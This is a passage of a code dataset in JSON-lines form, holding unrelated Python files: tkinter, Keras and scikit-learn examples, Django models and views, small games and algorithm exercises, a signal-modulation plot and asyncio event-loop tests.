# 使用循环创建多个 Radion button组件\n for val in compounds:\n Radiobutton(\n f,\n text=val,\n padx=20,\n variable=self.var,\n command=self.change_compound,\n value=val\n ).pack(side=LEFT, anchor=CENTER)\n\n # 都是同一个var,是如何实现读取到被选中的那个的呢?\n # 实现change_compound方法,用于动态改变Label的compound选项\n def change_compound(self):\n self.label['compound'] = self.var.get().lower()\n print(self.var.get())\n\nroot = Tk()\nroot.title(\"compound测试\")\nApp(root)\nroot.mainloop()\n","sub_path":"pyCharmProject/zfile_tkinter_learn/z012-compound-图片与文字并存.py","file_name":"z012-compound-图片与文字并存.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"169074100","text":"from keras.models import model_from_json\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom sklearn.cross_validation import train_test_split\nfrom keras.optimizers import SGD\nfrom keras.utils.np_utils import to_categorical\nimport operator\n\n#y_binary = to_categorical(y_int)\ndataset = pd.read_excel(\"Contact_Model.xlsx\")\n\nx=dataset.iloc[0:500,0:66].values\ny=dataset.iloc[0:500,66].values\nlabelEncoder_col= LabelEncoder()\nx[:,0] = labelEncoder_col.fit_transform(x[:,0])\nx[:,1] = labelEncoder_col.fit_transform(x[:,1])\nx[:,2]/=100\nx[:,3] = labelEncoder_col.fit_transform(x[:,3])\nx[:,4] = labelEncoder_col.fit_transform(x[:,4])\nx[:,5] = labelEncoder_col.fit_transform(x[:,5])\ny[:] = labelEncoder_col.fit_transform(y[:])\nfor i in range(6,66):\n x[:,i] = 
labelEncoder_col.fit_transform(x[:,i])\n\n'''\nprint(\"X_0_:{}\".format(x[:,0]))\nprint(\"X_1_:{}\".format(x[:,1]))\nprint(\"X_3_:{}\".format(x[:,3]))\nprint(\"X_4_:{}\".format(x[:,4]))\nprint(\"X_5_:{}\".format(x[:,7]))\nprint(\"Y_0_:{}\".format(y[:]))\n'''\n\nX_train, X_test, Y_train, Y_test = train_test_split(x,y,test_size=.1, random_state=0 )\nY_train = to_categorical(Y_train, 3)\ny = to_categorical(y, 3)\n\nmodel = Sequential()\nmodel.add(Dense(66, input_dim=66, activation='relu'))\nmodel.add(Dense(66, activation='relu'))\nmodel.add(Dense(3, activation='softmax'))\n\n\n#compile model\nmodel.compile(loss='MSE', optimizer=SGD(), metrics=['accuracy'] )\n\nmodel.summary()\n\nmodel.fit(X_train, Y_train, epochs=500 , batch_size=30)\n\n#model.fit(x, y, epochs=500 , batch_size=30)\n\n\n\nY_pred = model.predict(x)\nY_pred.shape\nprint(Y_pred)\nY_pre=[]\nfor i in Y_pred:\n max_index, max_value = max(enumerate(i), key=operator.itemgetter(1))\n Y_pre.append(max_index)\n\n\nq=np.asarray(Y_pre,dtype=np.int)\nY_test=np.asarray(Y_test,dtype=np.int)\n\nfrom sklearn.metrics import confusion_matrix\nconfusion=confusion_matrix(Y_test, q)\ntrue=0\nfalse=0\nfor i in range(0,500):\n if(Y_pre[i]==y[i]):\n true+=1\n else:\n false+=1\n\n \n''' #save model \nfname = \"weights_contact_model_sam.hdf5\"\nmodel.save_weights(fname,overwrite=True)\n'''\n #load model\n'''\nfname = \"weights_contact_model_sam.hdf5\"\nmodel.load_weights(fname)\n'''\n\n","sub_path":"contact_pred.py","file_name":"contact_pred.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547980365","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\n\n\nclass BaseProfile(models.Model):\n # Validators\n phone_validator = RegexValidator(r'^[6-9][0-9]{9}', message='Not a Valid Phone Number')\n # Choices\n GENDER_CHOICES = (\n ('M', 'Male'),\n ('F', 'Female')\n )\n BRANCH_CHOICES = (\n ('CSE', 'Computer Science and Engineering'),\n ('EE', 'Electrical Engineering'),\n ('ME', 'Mechanical Engineering'),\n ('BB', 'BioScience and BioTechnology')\n )\n YEAR_CHOICES = (\n ('1', '1st Year'),\n ('2', '2nd Year'),\n ('3', '3rd Year'),\n ('4', '4th Year')\n )\n phone = models.CharField(max_length=10, validators=[phone_validator])\n github = models.URLField()\n gender = models.CharField(max_length=1, choices=GENDER_CHOICES)\n branch = models.CharField(max_length=3, choices=BRANCH_CHOICES)\n year = models.CharField(max_length=1, choices=YEAR_CHOICES)\n\n class Meta:\n abstract = True\n\n\nclass StudentProfile(BaseProfile):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n\n\nclass MentorProfile(BaseProfile):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n","sub_path":"src/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"394946131","text":"\"\"\"\n\tA Python Graph Class\n\tGraph class with basic functionalities\n\"\"\"\n\nclass Graph(object):\n\tdef __init__(self, graph_dict = {}):\n\t\t\"\"\"initialize graph object\"\"\"\n\t\tself.__graph_dict = graph_dict\n\n\tdef vertices(self):\n\t\t\"\"\"returns the vertices of a graph\"\"\"\n\t\treturn list(self.__graph_dict.keys())\n\n\tdef edges(self):\n\t\t\"\"\"returns all the edges of a graph\"\"\"\n\t\treturn self.__generate_edges()\n\n\tdef add_vertex(self, 
vertex):\n\t\t\"\"\"\tif vertex not in graph_dict, then add \n\t\t\tkey vertex with an empty list to graph_dict\n\t\t\"\"\"\n\t\tif vertex not in self.__graph_dict:\n\t\t\tself.__graph_dict[vertex] = []\n\n\tdef add_edge(self, edge):\n\t\t\"\"\"assumes edge is a set/ tuple/ list\"\"\"\n\t\tedge = set(edge)\n\t\t(vertex1, vertex2) = tuple(edge)\n\t\tif vertex1 in self.__graph_dict:\n\t\t\tself.__graph_dict[vertex1].append(vertex2)\n\t\telse:\n\t\t\tself.__graph_dict[vertex1] = [vertex2]\n\n\tdef __generate_edges(self):\n\t\t\"\"\" generate edges in graph, edges representes as\n\t\t\tset with one/ two vertices\n\t\t\"\"\"\n\t\tedges = []\n\t\tfor vertex in self.__graph_dict:\n\t\t\tfor neighbor in self.__graph_dict[vertex]:\n\t\t\t\tif {neighbor, vertex} not in edges:\n\t\t\t\t\tedges.append({vertex, neighbor})\n\t\treturn edges\n\n\tdef find_path(self, start_vertex, end_vertex, path = []):\n\t\t\"\"\" finds a path from start vertex to end vertex in graph \"\"\"\n\t\tgraph = self.__graph_dict\n\t\tpath = path + [start_vertex]\n\t\tif start_vertex == end_vertex:\n\t\t\treturn path\n\t\tif start_vertex not in graph:\n\t\t\treturn None\n\t\tfor vertex in graph[start_vertex]:\n\t\t\tif vertex not in path:\n\t\t\t\textended_path = self.find_path(vertex, end_vertex, path)\n\t\t\t\tif extended_path:\n\t\t\t\t\treturn extended_path\n\t\treturn None\n\n\tdef find_all_paths(self, start_vertex, end_vertex, path = []):\n\t\t\"\"\"find all paths from start vertex to end vertex in graph\"\"\"\n\t\tgraph = self.__graph_dict\n\t\tpath = path + [start_vertex]\n\t\tif start_vertex == end_vertex:\n\t\t\treturn [path]\n\t\tif start_vertex not in graph:\n\t\t\treturn []\n\t\tpaths = []\n\t\tfor vertex in graph[start_vertex]:\n\t\t\tif vertex not in path:\n\t\t\t\textended_path = self.find_all_paths(vertex, end_vertex, path)\n\t\t\t\tfor p in extended_path:\n\t\t\t\t\tpaths.append(p)\n\t\treturn paths\n\t\t\n\n\n\n\n\tdef __str__(self):\n\t\tres = \"vertices: \"\n\t\tfor k in self.__graph_dict:\n\t\t\tres += str(k) + \" \"\n\t\tres += \"\\nedges\"\n\t\tfor edge in self.__generate_edges():\n\t\t\tres += str(edge) + \" \"\n\t\treturn res\n\nif __name__ == \"__main__\":\n\tg = { \"a\" : [\"c\"],\n\t\t \"b\" : [\"c\", \"e\"],\n\t\t \"c\" : [\"a\", \"b\", \"d\", \"e\"],\n\t\t \"d\" : [\"c\"],\n\t\t \"e\" : [\"c\", \"b\"],\n\t\t \"f\" : []\t\n\t}\n\n\tgraph = Graph(g)\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Edges of graph:\")\n\tprint(graph.edges())\n\n\tprint(\"Add vertex:\")\n\tgraph.add_vertex(\"z\")\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Add edge:\")\n\tgraph.add_edge({\"a\", \"z\"})\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Edges of graph:\")\n\tprint(graph.edges())\n\n\tprint('Adding an edge {\"x\", \"y\"} with new vertices:')\n\tgraph.add_edge({\"x\", \"y\"})\n\n\tprint(\"Vertices of graph:\")\n\tprint(graph.vertices())\n\n\tprint(\"Edges of graph:\")\n\tprint(graph.edges())","sub_path":"graph_class_rep.py","file_name":"graph_class_rep.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"449591379","text":"from random import randint\r\n\r\n\r\nclass BattleShip:\r\n board = []\r\n\r\n for x in range(10):\r\n board.append([\"O\"] * 15)\r\n\r\n def print_board(board):\r\n for row in board:\r\n print(\" \".join(row))\r\n\r\n print(\"Let's play Battleship!\")\r\n print_board(board)\r\n\r\n def num_hides(board):\r\n 
return randint(5, len(board))\r\n\r\n def random_row(board):\r\n return randint(0, len(board) - 1)\r\n\r\n def random_col(board):\r\n return randint(0, len(board[0]) - 1)\r\n\r\n hides = num_hides(board)\r\n ships = {}\r\n\r\n for hide in range(hides):\r\n ships.update({hide : [random_row(board) , random_col(board)]})\r\n\r\n newships = {}\r\n\r\n for ship in ships:\r\n ship_coords = ships[ship]\r\n board[ship_coords[0]][ship_coords[1]] = \"X\"\r\n if ship_coords[1] < (len(board[0]) - 1):\r\n board[ship_coords[0]][ship_coords[1] + 1] = \"x\"\r\n newships.update({hides : [ship_coords[0], ship_coords[1] + 1]})\r\n hides += 1\r\n\r\n ships.update(newships)\r\n print(hides)\r\n print(ships)\r\n print_board(board)\r\n\r\n print(ships.get(0))\r\n print(len(ships))\r\n print(ships.get(0)[0])\r\n\r\n guess_row = int(input(\"Guess Row:\"))\r\n guess_col = int(input(\"Guess Col:\"))\r\n\r\n tries = 0\r\n score = 0\r\n\r\n while tries <= hides:\r\n for correctAnswers in range(0, len(ships)):\r\n if guess_row == ships.get(correctAnswers)[0] and guess_col == ships.get(correctAnswers)[1]:\r\n score += 1\r\n if score == 1:\r\n print(\"Ow! You sank one of my battleships! Well, there's more.\")\r\n elif score > 1 and score < 6:\r\n print(\"Another one again!\")\r\n elif score > 5 and score < hides:\r\n print(\"Damn it! You're on a roll!\")\r\n else:\r\n print(\"Fine. You win. >:(\")\r\n\r\n if board[ships.get(correctAnswers)[0]][ships.get(correctAnswers)[1]] == \"X\":\r\n board[ships.get(correctAnswers)[0]][ships.get(correctAnswers)[1]] = \"<\"\r\n else:\r\n board[ships.get(correctAnswers)[0]][ships.get(correctAnswers)[1]] = \"~\"\r\n else:\r\n pass\r\n\r\n print_board(board)\r\n guess_row = int(input(\"Guess Row:\"))\r\n guess_col = int(input(\"Guess Col:\"))\r\n tries += 1\r\n\r\nBattleShip()\r\n","sub_path":"BattleShip.py","file_name":"BattleShip.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"642915086","text":"from fibonacci_module import fib\r\nfrom time import time\r\n\r\nmax_fibonacci = int(input(\"Fibonacci numbers for range 0 to \"))\r\n\r\nfor n in range(0, max_fibonacci + 1):\r\n start_time = time()\r\n fib_n = fib(n)\r\n elapsed_seconds = time() - start_time\r\n print(\"n: {0:3} fib(n): {1:10} elapsed seconds: {2}\".format(\r\n n, fib_n, elapsed_seconds))\r\n","sub_path":"ffhs/semesterarbeit/1a/fibonacci_time.py","file_name":"fibonacci_time.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370337573","text":"tc= int(input())\nwhile tc>0:\n n=int(input())\n a=[int(i) for i in input().split()]\n c=0\n for i in range(len(a)):\n for j in range(i+1,len(a)):\n if a[i]&a[j]==a[i]:\n c+=1\n print(c)\n tc=tc-1","sub_path":"Practice/Beginner/CENS20D.py","file_name":"CENS20D.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"283590314","text":"from django.shortcuts import render\nfrom django.http import Http404\nfrom .models import Chapter\n\n# Create your views here.\n\nPAGE_POST_NUM = 6\n\ndef pages(request, page_id=0):\n\tpage_id = int(page_id)\n\tQuerySet = Chapter.objects.filter(type=\"Blog\")\n\ttotal_num = QuerySet.count()\n\ttotal_page = (total_num+PAGE_POST_NUM-1)/PAGE_POST_NUM\n\tfirst_index = page_id*PAGE_POST_NUM\n\n\tchapter_list = QuerySet.order_by(\"-pub_date\")\n\tchapter_list = 
chapter_list[first_index:first_index+PAGE_POST_NUM]\n\tcontext = {\"chapter_list\":chapter_list, \"last_page\":page_id-1, \"next_page\":page_id+1, \"now_page\":page_id}\n\tif page_id <= 0:\n\t\tcontext[\"have_prev\"] = 0\n\telse:\n\t\tcontext[\"have_prev\"] = 1\n\tif page_id >= total_page-1:\n\t\tcontext[\"have_next\"] = 0\n\telse:\n\t\tcontext[\"have_next\"] = 1\n\treturn render(request, \"blog/posts.html\", context)\n\ndef post(request, back_info, post_id):\n\tpost_id = int(post_id)\n\tchapter_list = Chapter.objects.filter(id=post_id)\n\tchapter = chapter_list[0]\n\tchapter.open_times += 1\n\tchapter.save()\n\tcontext = {\"chapter\":chapter, \"back\":back_info}\n\treturn render(request, \"blog/post.html\", context)\n\ndef archives(request):\n\tQuerySet = Chapter.objects.filter(type=\"Blog\")\n\tchapter_list = QuerySet.order_by(\"-pub_date\")\n\tchapter_dict = {}\n\tfor chapter in chapter_list:\n\t\tyear = chapter.pub_date.year\n\t\tlist = chapter_dict.setdefault(year, [])\n\t\tlist.append(chapter)\n\tchapter_info = []\n\tfor year, chapter_list in sorted(chapter_dict.iteritems(), reverse=True):\n\t\tchapter_info.append({\"year\":year, \"chapter_list\":chapter_list})\n\tcontext = {\"chapter_info\":chapter_info}\n\treturn render(request, \"blog/archives.html\", context)\n\ndef about(request):\n\tchapter_list = Chapter.objects.filter(type=\"About\")\n\tchapter = chapter_list[0]\n\tchapter.open_times += 1\n\tchapter.save()\n\tcontext = {\"chapter\":chapter, \"back\":\"\"}\n\treturn render(request, \"blog/post.html\", context)\n\ndef books(request):\n\tchapter_list = Chapter.objects.filter(type=\"Books\")\n\tchapter = chapter_list[0]\n\tchapter.open_times += 1\n\tchapter.save()\n\tcontext = {\"chapter\":chapter, \"back\":\"\"}\n\treturn render(request, \"blog/post.html\", context)\n\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"317503842","text":"# Runtime: 20ms\n# Your runtime beats 100% of python submissions.\n\nclass Solution(object):\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n if digits == '': return []\n ans = []\n phoneMap = [[], ['a', 'b', 'c'], ['d', 'e', 'f'], ['g', 'h', 'i'], ['j', 'k', 'l'], ['m', 'n', 'o'], ['p', 'q', 'r', 's'], ['t', 'u', 'v'], ['w', 'x', 'y', 'z']]\n\n def compute(rest, formedStr):\n if rest == '':\n ans.append(formedStr)\n return\n for letter in phoneMap[int(rest[0]) - 1]:\n compute(rest[1:], formedStr + letter)\n\n compute(digits, '')\n return ans\n","sub_path":"11-20/17_letter_combinations_of_a_phone_number.py","file_name":"17_letter_combinations_of_a_phone_number.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"186743418","text":"#########################################################################################\r\n############# Sample Code in the Book: Introduction to ML with Python #############\r\n#########################################################################################\r\n\r\n# Part 7: Working with text data\r\n\r\n# 1. 
bag of words\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nvect = CountVectorizer()\r\nvect.fit(xxx)\r\nvect.vocabulary_ # this is a dictionary with key (words) and value (counts)\r\nbag_of_words = vect.transform(bards_words)\r\nbag_of_words.toarray()\r\n\r\n# bag of word for movie reviews\r\nvect = CountVectorizer().fit(text_train)\r\nX_train = vect.transform(text_train)\r\nfeature_names = vect.get_feature_names()\r\n\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import GridSearchCV\r\nparam_grid = {'C': [0.001, 0.01, 0.1, 1, 10]}\r\n\r\ngrid = GridSearchCV(LogisticRegression(), param_grid, cv=5)\r\ngrid.fit(X_train, y_train)\r\n\r\nprint(\"Best cross-validation score: {:.2f}\".format(grid.best_score_))\r\nprint(\"Best parameters: \", grid.best_params_)\r\n\r\nX_test = vect.transform(text_test)\r\ngrid.score(X_test, y_test)\r\n\r\n# with min_df\r\nvect = CountVectorizer(min_df=5).fit(text_train)\r\nX_train = vect.transform(text_train)\r\nprint(\"X_train with min_df: {}\".format(repr(X_train)))\r\n\r\n\r\n# 2. stop words\r\nfrom sklearn.feature_extraction import ENGLISH_STOP_WORDS\r\nvect = CountVectorizer(min_df=5, stop_words = \"english\").fit(text_train)\r\nX_train = vect.transform(text_train)\r\nrepr(X_train)\r\n\r\ngrid = GridSearchCV(LogisticRegression(), param_grod, cv=5)\r\ngrid.fit(X_train, y_train)\r\ngrid.best_score_\r\ngrid.best_params_\r\n\r\n# 3. tf-idf: term frequency–inverse document frequency\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.pipeline import make_pipeline\r\npipe = make_pipeline(TfidfVectorizer(min_df=5, norm=None), LogisticRegression())\r\nparam_grid = {'logisticregression__C':[0.001,0.01,0.1,1,10]}\r\ngrid = GridSearchCV(pipe, param_grid, cv=5)\r\ngrid.fit(text_train, y_train)\r\ngrid.best_score_\r\n\r\n\r\n\r\nvectorizer = grid.best_estimator_.name_steps[\"tfidfvectorizer\"]\r\nX_train = vectorizer.transform(text_train)\r\nmax_value = X_train.max(axis=0).toarray().ravel()\r\nsorted_by_tfidf = max_value.argsort()\r\nfeature_names = np.array(vectorizer.get_feature_names())\r\nfeature_names[sorted_by_tfidf[:20]]\r\nfeature_names[sorted_by_tfidf[-20:]]\r\n\r\n\r\n\r\n# 4. 
n-grams\r\ncv = CountVectorizer(ngram_range=(2, 2)).fit(xxxx)\r\ncv1 = CountVectorizer(ngram_range=(1, 3)).fit(xxxx)\r\nprint(\"Vocabulary size: {}\".format(len(cv.vocabulary_)))\r\nprint(\"Vocabulary:\\n{}\".format(cv.get_feature_names()))\r\n\r\npipe = make_pipeline(TfidfVectorizer(min_df=5), LogisticRegression())\r\n# running the grid-search takes a long time because of the\r\n# relatively large grid and the inclusion of trigrams\r\nparam_grid = {'logisticregression__C': [0.001, 0.01, 0.1, 1, 10, 100],\r\n \"tfidfvectorizer__ngram_range\": [(1, 1), (1, 2), (1, 3)]}\r\n\r\ngrid = GridSearchCV(pipe, param_grid, cv=5)\r\ngrid.fit(text_train, y_train)\r\nprint(\"Best cross-validation score: {:.2f}\".format(grid.best_score_))\r\nprint(\"Best parameters:\\n{}\".format(grid.best_params_))\r\n# extract scores from grid_search\r\nscores = grid.cv_results_['mean_test_score'].reshape(-1, 3).T\r\n# visualize heat map\r\nheatmap = mglearn.tools.heatmap(\r\n scores, xlabel=\"C\", ylabel=\"ngram_range\", cmap=\"viridis\", fmt=\"%.3f\",\r\n xticklabels=param_grid['logisticregression__C'],\r\n yticklabels=param_grid['tfidfvectorizer__ngram_range'])\r\nplt.colorbar(heatmap)\r\n\r\n# find 3-gram features\r\nmask = np.array([len(feature.split(\" \")) for feature in feature_names]) == 3\r\n# visualize only 3-gram features\r\nmglearn.tools.visualize_coefficients(coef.ravel()[mask],\r\n feature_names[mask], n_top_features=40)\r\nplt.ylim(-22, 22)\r\n\r\n\r\n# 5. tokenization, stemming and lemmatization\r\nimport spacy\r\nimport nltk\r\n\r\n# load spacy's English-language models\r\nen_nlp = spacy.load('en')\r\n# instantiate nltk's Porter stemmer\r\nstemmer = nltk.stem.PorterStemmer()\r\n\r\n# define function to compare lemmatization in spacy with stemming in nltk\r\ndef compare_normalization(doc):\r\n # tokenize document in spacy\r\n doc_spacy = en_nlp(doc)\r\n # print lemmas found by spacy\r\n print(\"Lemmatization:\")\r\n print([token.lemma_ for token in doc_spacy])\r\n # print tokens found by Porter stemmer\r\n print(\"Stemming:\")\r\n print([stemmer.stem(token.norm_.lower()) for token in doc_spacy])\r\n\r\n\r\n# 5.1 regular expression based tokenizer\r\n# Technicallity: we want to use the regexp based tokenizer\r\n# that is used by CountVectorizer and only use the lemmatization\r\n# from SpaCy. 
To this end, we replace en_nlp.tokenizer (the SpaCy tokenizer)\r\n# with the regexp based tokenization\r\nimport re\r\n# regexp used in CountVectorizer:\r\nregexp = re.compile('(?u)\\\\b\\\\w\\\\w+\\\\b')\r\n# load spacy language model\r\nen_nlp = spacy.load('en', disable=['parser', 'ner'])\r\nold_tokenizer = en_nlp.tokenizer\r\n# replace the tokenizer with the preceding regexp\r\nen_nlp.tokenizer = lambda string: old_tokenizer.tokens_from_list(\r\n regexp.findall(string))\r\n\r\n# create a custom tokenizer using the SpaCy document processing pipeline\r\n# (now using our own tokenizer)\r\ndef custom_tokenizer(document):\r\n doc_spacy = en_nlp(document)\r\n return [token.lemma_ for token in doc_spacy]\r\n\r\n# define a count vectorizer with the custom tokenizer\r\nlemma_vect = CountVectorizer(tokenizer=custom_tokenizer, min_df=5)\r\n\r\n# transform text_train using CountVectorizer with lemmatization\r\nX_train_lemma = lemma_vect.fit_transform(text_train)\r\nprint(\"X_train_lemma.shape: {}\".format(X_train_lemma.shape))\r\n\r\n# standard CountVectorizer for reference\r\nvect = CountVectorizer(min_df=5).fit(text_train)\r\nX_train = vect.transform(text_train)\r\nprint(\"X_train.shape: {}\".format(X_train.shape))\r\n\r\n\r\n# 6. Topic modeling\r\n# LDA: Latent Dirichlet Allocation\r\n\r\nvect = CountVectorizer(max_features=10000, max_df=.15)\r\nX = vect.fit_transform(text_train)\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\nlda = LatentDirichletAllocation(n_topics=10, learning_method=\"batch\",\r\n max_iter=25, random_state=0)\r\n# We build the model and transform the data in one step\r\n# Computing transform takes some time,\r\n# and we can save time by doing both at once\r\ndocument_topics = lda.fit_transform(X)\r\nprint(\"lda.components_.shape: {}\".format(lda.components_.shape))\r\n\r\n# for each topic (a row in the components_), sort the features (ascending).\r\n# Invert rows with [:, ::-1] to make sorting descending\r\nsorting = np.argsort(lda.components_, axis=1)[:, ::-1]\r\n# get the feature names from the vectorizer:\r\nfeature_names = np.array(vect.get_feature_names())\r\n# Print out the 10 topics:\r\nmglearn.tools.print_topics(topics=range(10), feature_names=feature_names,\r\n sorting=sorting, topics_per_chunk=5, n_words=10)\r\n\t\t\t\t\t\t \r\n\t\t\t\t\t\t \r\n# sort by weight of \"music\" topic 45\r\nmusic = np.argsort(document_topics100[:, 45])[::-1]\r\n# print the five documents where the topic is most important\r\nfor i in music[:10]:\r\n # show first two sentences\r\n print(b\".\".join(text_train[i].split(b\".\")[:2]) + b\".\\n\")\r\n\r\n\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"SampleCodes/Sample Codes_Part 7_20200119.py","file_name":"Sample Codes_Part 7_20200119.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"317936538","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import fftpack\n\n# Parâmetros do sinal\nAc = 2 # Amplitude da portadora\nMu = 0.7 # Índice de modulação\nfc = 25000 # Frequência da portadora Hz\nfm = 5000\nN = 10000\nTs = 1e-6 # Tempo de amostragem pequeno (modelar sinal contínuo)\nt = np.arange(N)*Ts\ns = Ac*(1+Mu*np.cos(2*np.pi*fm*t))*np.cos(2*np.pi*fc*t)\n\n\n# Gráfico do AM-DSB no 
tempo\nplt.figure(1,[10,7])\nplt.subplot(321)\nplt.plot(t,s)\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Tempo [s]\")\nplt.ylabel(\"Amplitude\")\n\n# Gráfico do AM-DSB na frequência\nplt.subplot(322)\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Frequência [kHz]\")\nplt.ylabel(\"Magnitude\")\nS_f = np.abs(np.fft.fftshift(np.fft.fft(s)))\nplt.plot(S_f)\n\nplt.subplot(323)\n\nMu = 1.0\ns = Ac*(1+Mu*np.cos(2*np.pi*fm*t))*np.cos(2*np.pi*fc*t)\n\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.ylabel(\"Amplitude (v)\")\nplt.xlabel(\"Tempo [s]\")\nplt.plot(t,s)\n\n\n\nplt.subplot(324)\n\n\n\n\n\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Frequência [kHz]\")\nplt.ylabel(\"Magnitude\")\nS_f = np.abs(np.fft.fftshift(np.fft.fft(s)))\n\nplt.plot(S_f)\n\n\n\nplt.subplot(325)\nMu = 2.0\ns = Ac*(1+Mu*np.cos(2*np.pi*fm*t))*np.cos(2*np.pi*fc*t)\nplt.plot(t,s)\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Tempo [s]\")\nplt.ylabel(\"Amplitude\")\n\n\nplt.subplot(326)\n\n\n\n\n\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Frequência [kHz]\")\nplt.ylabel(\"Magnitude\")\nS_f = np.abs(np.fft.fftshift(np.fft.fft(s)))\n\nplt.plot(S_f)\n\n\n\nplt.tight_layout()\nplt.show()","sub_path":"efeito_indice_modulacao_3_casos.py","file_name":"efeito_indice_modulacao_3_casos.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"97493599","text":"# © 2013 Mark Harviston \n# © 2014 Arve Knudsen \n# BSD License\nimport asyncio\nimport locale\nimport logging\nimport sys\nimport ctypes\nimport multiprocessing\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\nimport socket\n\nimport quamash\n\nimport pytest\n\n\nclass _SubprocessProtocol(asyncio.SubprocessProtocol):\n\tdef __init__(self, *args, **kwds):\n\t\tsuper(_SubprocessProtocol, self).__init__(*args, **kwds)\n\t\tself.received_stdout = None\n\n\tdef pipe_data_received(self, fd, data):\n\t\ttext = data.decode(locale.getpreferredencoding(False))\n\t\tif fd == 1:\n\t\t\tself.received_stdout = text.strip()\n\n\tdef process_exited(self):\n\t\tasyncio.get_event_loop().stop()\n\n\n@pytest.fixture(scope='session')\ndef application():\n\treturn quamash.QApplication.instance() or quamash.QApplication([])\n\n\n@pytest.fixture\ndef loop(request, application):\n\tlp = quamash.QEventLoop(application)\n\tasyncio.set_event_loop(lp)\n\n\tdef fin():\n\t\tsys.excepthook = orig_excepthook\n\n\t\ttry:\n\t\t\tlp.close()\n\t\tfinally:\n\t\t\tasyncio.set_event_loop(None)\n\n\tdef excepthook(type, *args):\n\t\tlp.stop()\n\t\torig_excepthook(type, *args)\n\n\torig_excepthook = sys.excepthook\n\tsys.excepthook = excepthook\n\n\trequest.addfinalizer(fin)\n\treturn lp\n\n\n@pytest.fixture(\n\tparams=[None, quamash.QThreadExecutor, ThreadPoolExecutor, ProcessPoolExecutor]\n)\ndef executor(request):\n\texc_cls = request.param\n\tif exc_cls is None:\n\t\treturn None\n\n\texc = exc_cls(1) # FIXME? 
fixed number of workers?\n\trequest.addfinalizer(exc.shutdown)\n\treturn exc\n\n\nclass TestCanRunTasksInExecutor:\n\t\"\"\"\n\tThis needs to be a class because pickle can't serialize closures,\n\tbut can serialize bound methods.\n\tmultiprocessing can only handle pickleable functions.\n\t\"\"\"\n\tdef test_can_run_tasks_in_executor(self, loop, executor):\n\t\t\"\"\"Verify that tasks can be run in an executor.\"\"\"\n\t\tlogging.debug('Loop: {!r}'.format(loop))\n\t\tlogging.debug('Executor: {!r}'.format(executor))\n\n\t\tmanager = multiprocessing.Manager()\n\t\twas_invoked = manager.Value(ctypes.c_int, 0)\n\t\tlogging.debug('running until complete')\n\t\tloop.run_until_complete(self.blocking_task(loop, executor, was_invoked))\n\t\tlogging.debug('ran')\n\n\t\tassert was_invoked.value == 1\n\n\tdef blocking_func(self, was_invoked):\n\t\tlogging.debug('start blocking_func()')\n\t\twas_invoked.value = 1\n\t\tlogging.debug('end blocking_func()')\n\n\t@asyncio.coroutine\n\tdef blocking_task(self, loop, executor, was_invoked):\n\t\tlogging.debug('start blocking task()')\n\t\tfut = loop.run_in_executor(executor, self.blocking_func, was_invoked)\n\t\tyield from asyncio.wait_for(fut, timeout=5.0)\n\t\tlogging.debug('start blocking task()')\n\n\ndef 